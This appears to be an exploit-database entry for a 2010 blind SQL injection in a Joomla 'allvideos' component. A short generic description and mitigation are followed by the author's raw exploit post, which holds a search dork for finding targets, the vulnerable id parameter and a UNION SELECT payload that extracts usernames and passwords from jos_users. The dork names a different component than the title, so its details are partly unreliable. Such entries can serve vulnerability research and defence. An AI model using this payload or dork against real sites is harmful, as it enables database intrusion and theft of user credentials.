joomla component allvideos BLIND SQL injection Vulnerability

vendor:

N/A

by:

bumble_be

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP 2

2010

joomla component allvideos BLIND SQL injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. This can be done by appending the malicious SQL query to the vulnerable parameter in the URL. This can allow an attacker to gain access to the database and execute arbitrary SQL queries.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: joomla component allvideos BLIND SQL injection Vulnerability 
# Date: 09 april 2010
# Author: bumble_be
# Software Link: N/A
# Tested on: Windows XP 2

======================================================================
[x] author : bumble_be (iogi89@ymail.com)
[x] dork   : inurl:option=com_huruhelpdesk
[x] myweb  : http://linggau-haxor.com
======================================================================

==== SQLI EXPLOIT ====
/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12--



==== VULN IN HERE ====

http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339[c0de]



==== LIVE DEMO ====

http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12+from+jos_users--


[x]-------------------------------------------------------------------

GREETZ TO WE FORUM:
DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID

[x]-------------------------------------------------------------------

MY BROTHA :
mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death,
eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker :)

[x]-------------------------------------------------------------------

note :mulailah sesuatu dengan ucapan bissmillah

[X]-------------------------------------------------------------------
INDONESIA STILL UP AND WE NOT DEAD :0